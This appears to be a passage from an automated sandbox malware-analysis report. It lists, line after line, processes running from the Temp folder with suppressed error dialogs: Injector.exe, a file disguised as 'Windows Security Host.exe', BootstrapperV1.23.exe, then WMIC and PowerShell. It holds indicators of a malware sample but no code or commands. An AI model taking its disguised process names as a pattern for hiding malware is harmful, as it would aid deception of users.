                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
